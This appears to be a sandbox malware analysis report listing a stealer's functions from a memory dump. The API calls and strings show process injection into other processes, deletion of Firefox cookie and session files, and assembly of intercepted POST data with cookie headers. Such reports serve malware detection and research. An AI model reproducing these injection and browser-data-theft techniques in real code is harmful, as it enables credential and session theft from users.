Part of subcall function 02CA14D8: FindFirstFileW.KERNELBASE(00000000,?), ref: 02CA151C
Part of subcall function 02CA14D8: wsprintfW.USER32 ref: 02CA1557
Part of subcall function 02CA14D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 02CA156A
Part of subcall function 02CA14D8: DeleteFileW.KERNELBASE(00000000), ref: 02CA1571
Part of subcall function 02CA14D8: FindNextFileW.KERNELBASE(00000000,00000010), ref: 02CA1584
Part of subcall function 02CA14D8: FindClose.KERNELBASE(00000000), ref: 02CA158F

Strings

sessionstore.*, xrefs: 02CA36F2
\Mozilla\Firefox\Profiles\, xrefs: 02CA36D6
firefox.exe, xrefs: 02CA36A4
cookies.sqlite, xrefs: 02CA36E4

Memory Dump Source

Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd

Similarity

API ID: File$Find$CloseFirstHeapwsprintf$AllocateAttributesCreateDeleteFolderHandleNextPathProcessProcess32SleepSnapshotSpecialToolhelp32lstrcat
String ID: \Mozilla\Firefox\Profiles\$cookies.sqlite$firefox.exe$sessionstore.*
API String ID: 2731919298-637609321
Opcode ID: 6469a725e2c72339bbcee4b374b0ba80778ff13d3e2e8eb26970755c055b7d64
Instruction ID: 55d64ed24c3827122647817df55b9826cfe22de90afe1878c394a03711307844
Opcode Fuzzy Hash: 6469a725e2c72339bbcee4b374b0ba80778ff13d3e2e8eb26970755c055b7d64
Instruction Fuzzy Hash: A5F0A75174115273973C376E5C3DE6F295ECBD6B5EB04011CF10E93180CED4090166B9

Function 02CA1363 Relevance: 7.5, APIs: 5, Instructions: 39
processstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02CA1374
Process32First.KERNEL32(00000000,?), ref: 02CA1393
lstrcmpiA.KERNEL32(?), ref: 02CA13A3
Process32Next.KERNEL32(00000000,00000128), ref: 02CA13C0
CloseHandle.KERNELBASE(00000000), ref: 02CA13CB

Memory Dump Source

Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmpi
String ID:
API String ID: 868014591-0
Opcode ID: b7a1409cc142021b3d06f27964059da7eb61c91e54f57b79ec948b539b4fc309
Instruction ID: b3f08d83ae0869c64c9f62c0fdbdf59092c07cef7f5126901276a4617f371858
Opcode Fuzzy Hash: b7a1409cc142021b3d06f27964059da7eb61c91e54f57b79ec948b539b4fc309
Instruction Fuzzy Hash: D8F0C8319421249BDB345E659C19BDE77BCEB49329F0006A0E94DD3180EBF44A648AD0

Function 02CA1235 Relevance: 3.0, APIs: 2, Instructions: 23
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 02CA123F
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,02CA3C33), ref: 02CA1251

Memory Dump Source

Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd

Similarity

API ID: File$MappingOpenView
String ID:
API String ID: 3439327939-0
Opcode ID: b04cc3462836f2d9fb8662367382e85ef2cbc6c152caa933a9d691eb18c377ca
Instruction ID: bfb41037fa8b41ff6d478ed65b77446b1394c0396f3ff42feb8926ae06df90aa
Opcode Fuzzy Hash: b04cc3462836f2d9fb8662367382e85ef2cbc6c152caa933a9d691eb18c377ca
Instruction Fuzzy Hash: F1D0E222B45221ABE3341AAA6C0DF836E9DDFC6AE5B064225B509D2140D6A08820C6F0

Function 02CA1011 Relevance: 3.0, APIs: 2, Instructions: 12
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CA1274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02CA1281

GetProcessHeap.KERNEL32(00000000,00000000,00000000,02CA14CB), ref: 02CA1020
RtlFreeHeap.NTDLL(00000000), ref: 02CA1027

Memory Dump Source

Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd

Similarity

API ID: Heap$FreeProcessQueryVirtual
String ID:
API String ID: 2580854192-0
Opcode ID: d5275c81c5b332737c42391a96f7d632c358577938d3f0c9f57a7e6884756f9f
Instruction ID: b68a152b292211c5b4e61e69594c1ad370615a15b4cda1f174a235aa7c37c968
Opcode Fuzzy Hash: d5275c81c5b332737c42391a96f7d632c358577938d3f0c9f57a7e6884756f9f
Instruction Fuzzy Hash: DBC08C3184426096CB3427A0380EBC62A089F0921DF090A41B508A3041CBE088249AE0

Function 02CA15A9 Relevance: 3.0, APIs: 2, Instructions: 9
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileAttributesW.KERNELBASE(00000000,00000020,00000000,02CA168B), ref: 02CA15AF
DeleteFileW.KERNELBASE(00000000), ref: 02CA15B6

Memory Dump Source

Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd

Similarity

API ID: File$AttributesDelete
String ID:
API String ID: 2910425767-0
Opcode ID: 431dfcbcb615d007891a5ff08a3e3ca03bd755dc6be2efc4fd424a795e1dbd9b
Instruction ID: 295a5553b4fd1313ccd5d9ede99a3f11079b7bd96c5a6c34a2eb61570d505f4b
Opcode Fuzzy Hash: 431dfcbcb615d007891a5ff08a3e3ca03bd755dc6be2efc4fd424a795e1dbd9b
Instruction Fuzzy Hash: F7B09232882534AFD6292B14B80EBCE2658EF0A215B050652F201920408BD41E1296EA

Function 02CA1000 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,00000208,02CA1418), ref: 02CA1003
RtlAllocateHeap.NTDLL(00000000), ref: 02CA100A

Memory Dump Source

Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: e9898b40b4de83173ec4145b64af3af976179f75ec1bcfb1eb87e797c92866f3
Instruction ID: b6e33d9e49125b0a9f4b91021f3f42440d0fe8b4a1a89cb0eea5afa7ae852a02
Opcode Fuzzy Hash: e9898b40b4de83173ec4145b64af3af976179f75ec1bcfb1eb87e797c92866f3
Instruction Fuzzy Hash: 6BA002B5D901105BDE5857A4B90FF153528B744749F148A44714687040DBE454349761

Non-executed Functions

Function 02CA1FE5 Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 208injectionnativesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 02CA1274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02CA1281

OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000001,74DEE800), ref: 02CA201A
NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 02CA2055
NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 02CA20E5
RtlMoveMemory.NTDLL(00000000,02CA50A0,00000016), ref: 02CA210C
RtlMoveMemory.NTDLL(-00000016,00000363), ref: 02CA2134
NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 02CA2144
CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter), ref: 02CA215E
GetLastError.KERNEL32 ref: 02CA2166
CloseHandle.KERNEL32(00000000), ref: 02CA2174
Sleep.KERNEL32(000003E8), ref: 02CA217B
GetModuleHandleA.KERNEL32(ntdll,atan), ref: 02CA2191
GetProcAddress.KERNEL32(00000000), ref: 02CA2198
ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02CA21AE
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02CA21D8
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02CA21EB
CloseHandle.KERNEL32(00000000), ref: 02CA21F2
Sleep.KERNEL32(000001F4), ref: 02CA21F9
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02CA220D
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02CA2224
CloseHandle.KERNEL32(00000000), ref: 02CA2231
CloseHandle.KERNEL32(?), ref: 02CA2237
CloseHandle.KERNEL32(?), ref: 02CA223D
CloseHandle.KERNEL32(00000000), ref: 02CA2240

Strings

opera_shared_counter, xrefs: 02CA2157
ntdll, xrefs: 02CA218C
atan, xrefs: 02CA2187

Memory Dump Source

Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd

Similarity

API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
String ID: atan$ntdll$opera_shared_counter
API String ID: 1066286714-2737717697
Opcode ID: 1eb317f600dde710df04b1bc3647639cbf9cce4199ce8508b83ec7358aead22f
Instruction ID: 8cf1060b910333bbb496b1b185098900e9287dd6cc0c656f2b2eb5c2d192cdc4
Opcode Fuzzy Hash: 1eb317f600dde710df04b1bc3647639cbf9cce4199ce8508b83ec7358aead22f
Instruction Fuzzy Hash: 1B61E131A44316AFD3248F61CC85E6B7BEDEF88758F040B29F949D3241DBB4D9048BA2

Function 02CA118D Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68encryptionstringCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 02CA11A9
CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 02CA11C1
lstrlen.KERNEL32(?,00000000), ref: 02CA11C9
CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 02CA11D4
CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 02CA11EE
wsprintfA.USER32 ref: 02CA1205
CryptDestroyHash.ADVAPI32(?), ref: 02CA121E
CryptReleaseContext.ADVAPI32(?,00000000), ref: 02CA1228

Strings

%02X, xrefs: 02CA11FF

Memory Dump Source

Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd

Similarity

API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
String ID: %02X
API String ID: 3341110664-436463671
Opcode ID: a53f8c713e0aae5ed768969c270fde82e74a83fcfe9474b81c44c001e55ed005
Instruction ID: 08f0970335243534446b46f2218d1887773eb1e7ece0ec5b40269bc58023515b
Opcode Fuzzy Hash: a53f8c713e0aae5ed768969c270fde82e74a83fcfe9474b81c44c001e55ed005
Instruction Fuzzy Hash: FD113071D4010CBFEB259F95EC49FAEBB7CEB84309F104565F605E2140D7B14E11ABA0

Function 02CA16C7 Relevance: 15.1, APIs: 10, Instructions: 51threadprocessinjectionCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 02CA16D9
GetCurrentThreadId.KERNEL32 ref: 02CA16E1
CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 02CA16F1
Thread32First.KERNEL32(00000000,0000001C), ref: 02CA16FF
OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 02CA171E
SuspendThread.KERNEL32(00000000), ref: 02CA172E
CloseHandle.KERNEL32(00000000), ref: 02CA173D
Thread32Next.KERNEL32(00000000,0000001C), ref: 02CA174D
CloseHandle.KERNEL32(00000000), ref: 02CA1758

Memory Dump Source

Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd

Similarity

API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
String ID:
API String ID: 1467098526-0
Opcode ID: cadfd5f7e02faaeff4f848d345001d8bc8f90d92be49b831c08500b5062819c2
Instruction ID: 2e8d7c7cf8b643d2918159c521bd39c765615a6669490a5a95adb609c3cf8f97
Opcode Fuzzy Hash: cadfd5f7e02faaeff4f848d345001d8bc8f90d92be49b831c08500b5062819c2
Instruction Fuzzy Hash: 0D11C232848201DFD3259FA09849B6F7BE8EF85709F040919F689C3140C7B08559EBE3

Function 02CA2E1B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54nativeCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00001000,00000000,?,?,00000001,?,02CA2EC5), ref: 02CA2E27

Part of subcall function 02CA1000: GetProcessHeap.KERNEL32(00000008,00000208,02CA1418), ref: 02CA1003
Part of subcall function 02CA1000: RtlAllocateHeap.NTDLL(00000000), ref: 02CA100A

NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,00010006,?), ref: 02CA2E52
NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,?,?), ref: 02CA2E7F
StrStrIW.SHLWAPI(?,NetworkService), ref: 02CA2E92

Part of subcall function 02CA1011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,02CA14CB), ref: 02CA1020
Part of subcall function 02CA1011: RtlFreeHeap.NTDLL(00000000), ref: 02CA1027

Strings

NetworkService, xrefs: 02CA2E8A

Memory Dump Source

Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd

Similarity

API ID: Process$Heap$InformationQuery$AllocateFreeOpen
String ID: NetworkService
API String ID: 1656241333-2019834739
Opcode ID: a325c1cb662c89e20bc298591119ff439962c79c4e796f1710cf704e3a530892
Instruction ID: 534f66c828980a66467677fba8b792d4c1708ef4610add59f32e201ff6f9d8ad
Opcode Fuzzy Hash: a325c1cb662c89e20bc298591119ff439962c79c4e796f1710cf704e3a530892
Instruction Fuzzy Hash: CC01DD71340346BFD3286A619C55F97779DEBD83AAF014529FA0BE3141DAF098808760

Function 02CA2FAA Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 124stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02CA1141: lstrlen.KERNEL32(?,?,?,00000000,?,02CA29DD,00000001), ref: 02CA1150
Part of subcall function 02CA1141: lstrlen.KERNEL32(:method POST,?,00000000,?,02CA29DD,00000001), ref: 02CA1155

RtlZeroMemory.NTDLL(?,0000000A), ref: 02CA2FFA
StrToIntA.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,02CA3347), ref: 02CA3024
lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,02CA3347), ref: 02CA3052
wsprintfA.USER32 ref: 02CA30B9
lstrcat.KERNEL32(00000000,00000000), ref: 02CA30E5
lstrcat.KERNEL32(?,{:!:}), ref: 02CA30F8
lstrlen.KERNEL32(?,?,?,?,?,?,?,02CA6038), ref: 02CA3109
RtlMoveMemory.NTDLL(00000000), ref: 02CA3112

Part of subcall function 02CA1011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,02CA14CB), ref: 02CA1020
Part of subcall function 02CA1011: RtlFreeHeap.NTDLL(00000000), ref: 02CA1027

Strings

Host:, xrefs: 02CA303B
Content-Length:, xrefs: 02CA3004
Cookie:, xrefs: 02CA30CE
User-Agent:, xrefs: 02CA3094
%s{:!:}%s{:!:}%s{:!:}, xrefs: 02CA30B3
application/json, xrefs: 02CA2FC5
application/x-www-form-urlencoded, xrefs: 02CA2FAD
{:!:}, xrefs: 02CA30F2
, xrefs: 02CA3068

Memory Dump Source

Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd

Similarity

API ID: lstrlen$HeapMemorylstrcat$FreeMoveProcessZerowsprintf
String ID: $%s{:!:}%s{:!:}%s{:!:}$Content-Length:$Cookie:$Host:$User-Agent:$application/json$application/x-www-form-urlencoded${:!:}
API String ID: 2886538537-1627781280
Opcode ID: 8ee406401243029ffc60d867933269d4cfb81de7138297f09d7438c3f1b69768
Instruction ID: 3f874f89b1060d7899f34aed0aced55d461bc6357fe8395dc8eed51118cdab1a
Opcode Fuzzy Hash: 8ee406401243029ffc60d867933269d4cfb81de7138297f09d7438c3f1b69768
Instruction Fuzzy Hash: 863115717403436BD718AB249C75B6F36ABDBC074DF04842CF9069B281DBB5D8059BE1

Function 02CA3132 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 141stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000), ref: 02CA322D
wsprintfA.USER32 ref: 02CA329E
lstrcat.KERNEL32(00000000,00000000), ref: 02CA32AF
lstrcat.KERNEL32(00000000,{:!:}), ref: 02CA32BE
lstrlen.KERNEL32(00000000), ref: 02CA32C1
RtlMoveMemory.NTDLL(00000000,?,?), ref: 02CA32D2

Part of subcall function 02CA1011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,02CA14CB), ref: 02CA1020
Part of subcall function 02CA1011: RtlFreeHeap.NTDLL(00000000), ref: 02CA1027

Strings

%s{:!:}%s{:!:}%s{:!:}, xrefs: 02CA3298
{:!:}, xrefs: 02CA32B8
POST, xrefs: 02CA327F

Memory Dump Source

Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd

Similarity

API ID: Heaplstrcatlstrlen$FreeMemoryMoveProcesswsprintf
String ID: %s{:!:}%s{:!:}%s{:!:}$POST${:!:}
API String ID: 3430864794-1604029033
Opcode ID: fdfbcf3848b39e090e8344579fe378f759a84d3054c5b367f55921aa3f0e57bd
Instruction ID: fafac59142899c1ac56334337f86418edca5420a43cc7ce2217cd8e4fff8a47d
Opcode Fuzzy Hash: fdfbcf3848b39e090e8344579fe378f759a84d3054c5b367f55921aa3f0e57bd
Instruction Fuzzy Hash: 6841AD71504346AFD310DF10DC59F6BBBEDFB84349F040A2EF58693241DBB499489BA6

Function 02CA3449 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 109stringCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(02CA6038), ref: 02CA3455
lstrcat.KERNEL32 ref: 02CA34AB

Part of subcall function 02CA2FAA: RtlZeroMemory.NTDLL(?,0000000A), ref: 02CA2FFA
Part of subcall function 02CA2FAA: StrToIntA.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,02CA3347), ref: 02CA3024
Part of subcall function 02CA2FAA: lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,02CA3347), ref: 02CA3052
Part of subcall function 02CA2FAA: wsprintfA.USER32 ref: 02CA30B9
Part of subcall function 02CA2FAA: lstrcat.KERNEL32(00000000,00000000), ref: 02CA30E5

Part of subcall function 02CA2F1F: CreateThread.KERNEL32(00000000,00000000,02CA2ED2,?,00000000,00000000), ref: 02CA2F2F
Part of subcall function 02CA2F1F: CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 02CA2F36

Part of subcall function 02CA105D: VirtualFree.KERNEL32(?,00000000,00008000,02CA2BB2), ref: 02CA1065

RtlZeroMemory.NTDLL(0000000A,0000000A), ref: 02CA3504
StrToIntA.SHLWAPI(?,00000000,?), ref: 02CA352B
RtlMoveMemory.NTDLL(00000000,?,-00000003), ref: 02CA358D
RtlLeaveCriticalSection.NTDLL(02CA6038), ref: 02CA35C1

Part of subcall function 02CA1274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02CA1281

Strings

Content-Length:, xrefs: 02CA350E
, xrefs: 02CA353D
POST, xrefs: 02CA34F1

Memory Dump Source

Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd

Similarity

API ID: Memory$CriticalSectionVirtualZerolstrcat$CloseCreateEnterFreeHandleLeaveMoveQueryThreadlstrlenwsprintf
String ID: $Content-Length:$POST
API String ID: 2960674810-114478848
Opcode ID: 7b2cfb6c0ca12090cc470418836b990fe8dd0b4678a5d9e295f38f30510c6cb4
Instruction ID: 706150340f507b1e70a7ca9320a347fdc2d3cfff9e87952ba7c08029bc80db48
Opcode Fuzzy Hash: 7b2cfb6c0ca12090cc470418836b990fe8dd0b4678a5d9e295f38f30510c6cb4
Instruction Fuzzy Hash: 69312930A843828BCF14AF24D4B676A3B6EAB8530CF184A6DD90243241DB75C55CCFD9

Function 02CA186C Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 227COMMON

Download Yara Rule

APIs

Part of subcall function 02CA1000: GetProcessHeap.KERNEL32(00000008,00000208,02CA1418), ref: 02CA1003
Part of subcall function 02CA1000: RtlAllocateHeap.NTDLL(00000000), ref: 02CA100A

Part of subcall function 02CA106C: lstrlen.KERNEL32(?,?,00000000,00000000,02CA189F,74DE8A60,?,00000000), ref: 02CA1074
Part of subcall function 02CA106C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000), ref: 02CA1086

Part of subcall function 02CA17DC: RtlZeroMemory.NTDLL(?,00000018), ref: 02CA17EE

RtlZeroMemory.NTDLL(?,0000003C), ref: 02CA18FB
wsprintfW.USER32 ref: 02CA19F2
RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 02CA1AD0

Strings

POST, xrefs: 02CA19A0
Content-Type: application/x-www-form-urlencoded, xrefs: 02CA1A34
Accept: */*Referer: %S, xrefs: 02CA19E8

Memory Dump Source

Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd

Similarity

API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
API String ID: 3833683434-704803497
Opcode ID: 95d1b5b2aa29737b7f6f5ea33e448c2547ec0c008fa4dd9e604628cc013b4bfb
Instruction ID: bc0deac83f1548304797a35b4827a738a71e98922154a1fc28e118a87eb28fb0
Opcode Fuzzy Hash: 95d1b5b2aa29737b7f6f5ea33e448c2547ec0c008fa4dd9e604628cc013b4bfb
Instruction Fuzzy Hash: 00816E75644301AFD7249F64D894A2BB7E9EFC8358F04092DF54AD3250DBB0DD05CBA2

Function 02CA23E3 Relevance: 10.7, APIs: 4, Strings: 3, Instructions: 190stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02CA104C: VirtualAlloc.KERNEL32(00000000,00001105,00003000,00000040,02CA2A16,?,00000001), ref: 02CA1056

lstrcat.KERNEL32(?,00000000), ref: 02CA25BB
lstrcat.KERNEL32(?,02CA42A8), ref: 02CA25C7
lstrcat.KERNEL32(?,?), ref: 02CA25D6
lstrcat.KERNEL32(?,02CA42AC), ref: 02CA25E5

Strings

dyn_header, xrefs: 02CA24C8
?, xrefs: 02CA2463
:authority, xrefs: 02CA243A

Memory Dump Source

Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd

Similarity

API ID: lstrcat$AllocVirtual
String ID: :authority$?$dyn_header
API String ID: 3028025275-1785586894
Opcode ID: 228ae17471cc338dfd0670f992ccd5c3840a36cdc870f614539968e764a9f022
Instruction ID: 2e0113035088f1736ab6af32e114441ae995e246a788909653cf922de1586fa7
Opcode Fuzzy Hash: 228ae17471cc338dfd0670f992ccd5c3840a36cdc870f614539968e764a9f022
Instruction Fuzzy Hash: 4A61F6725083278FC714EE25D1B03AAB7E6ABD421CF44092DEC8557282D7749E0DEBA3

Function 02CA28AD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02CA1141: lstrlen.KERNEL32(?,?,?,00000000,?,02CA29DD,00000001), ref: 02CA1150
Part of subcall function 02CA1141: lstrlen.KERNEL32(:method POST,?,00000000,?,02CA29DD,00000001), ref: 02CA1155

RtlMoveMemory.NTDLL(?,?,-00000008), ref: 02CA291B
lstrcat.KERNEL32(?,02CA42BC), ref: 02CA292A
lstrlen.KERNEL32(?,?,00000001), ref: 02CA295C

Strings

cookie , xrefs: 02CA28D4, 02CA293C

Memory Dump Source

Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd

Similarity

API ID: lstrlen$MemoryMovelstrcat
String ID: cookie
API String ID: 2957667536-1295510418
Opcode ID: a365728c64a5466fc4dc0b0e422f5d9adae4c76a373b578ab8d8d4e27955a2f5
Instruction ID: 3c7d8d8fea98afc59aa20b54979eb0d12408d2aa1ca1affe93bf671edecc857e
Opcode Fuzzy Hash: a365728c64a5466fc4dc0b0e422f5d9adae4c76a373b578ab8d8d4e27955a2f5
Instruction Fuzzy Hash: 2611E7723043135BC7249AA4DCA5B9B76E9EBC0B0CF14062DFD0197241E7E1E90A9792

Function 02CA1E4C Relevance: 6.1, APIs: 4, Instructions: 101libraryloaderCOMMON

Download Yara Rule

APIs

RtlMoveMemory.NTDLL(?,?,?), ref: 02CA1E83
LoadLibraryA.KERNEL32(?,02CA6058,00000000,00000000,74DF2EE0,00000000,02CA20DC,?), ref: 02CA1EAB
GetProcAddress.KERNEL32(00000000,-00000002), ref: 02CA1ED8
LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 02CA1F29

Memory Dump Source

Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd

Similarity

API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
String ID:
API String ID: 3827878703-0
Opcode ID: 3ca162a459720f81de057d9c7005e98f607866194b17566d0286a67de474447e
Instruction ID: 8c79b2da9e436e2e8b47bb4db411878171d87d5e0710a18105af8f975c484317
Opcode Fuzzy Hash: 3ca162a459720f81de057d9c7005e98f607866194b17566d0286a67de474447e
Instruction Fuzzy Hash: 0D31B2767002439BCB288E2ACCA4BA6B798EF4531CF18456CE849C7200D7A2E855C7A0

Function 02CA12AA Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000400,00000000), ref: 02CA12BC
IsWow64Process.KERNEL32(000000FF,?), ref: 02CA12CE
IsWow64Process.KERNEL32(00000000,?), ref: 02CA12E1
CloseHandle.KERNEL32(00000000), ref: 02CA12F7

Memory Dump Source

Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd

Similarity

API ID: Process$Wow64$CloseHandleOpen
String ID:
API String ID: 331459951-0
Opcode ID: 39e123497ec5db25bf6b564563f01f9468909d751599c039e071917dadb82690
Instruction ID: e205e989a7e436069591cfc662774139a00b50f8bf9aabcda157e2e84773aa3b
Opcode Fuzzy Hash: 39e123497ec5db25bf6b564563f01f9468909d751599c039e071917dadb82690
Instruction Fuzzy Hash: 10F09071C46219FF9B24CFA0A9459EEBB6CEB0125DF14436AE805D3140D7B08F11EAA1

Function 02CA32F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(02CA6038), ref: 02CA3332
RtlLeaveCriticalSection.NTDLL(02CA6038), ref: 02CA3358

Strings

POST, xrefs: 02CA3338

Memory Dump Source

Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: POST
API String ID: 3168844106-1814004025
Opcode ID: 6769167857f9a87575833160914cd7d4718b68344c75f8bf7a4b6d3095b20903
Instruction ID: 5b9bbeb71536eb7a8f85d6b56d523b0a18fa702ae6f6bb630594039bcee4b956
Opcode Fuzzy Hash: 6769167857f9a87575833160914cd7d4718b68344c75f8bf7a4b6d3095b20903
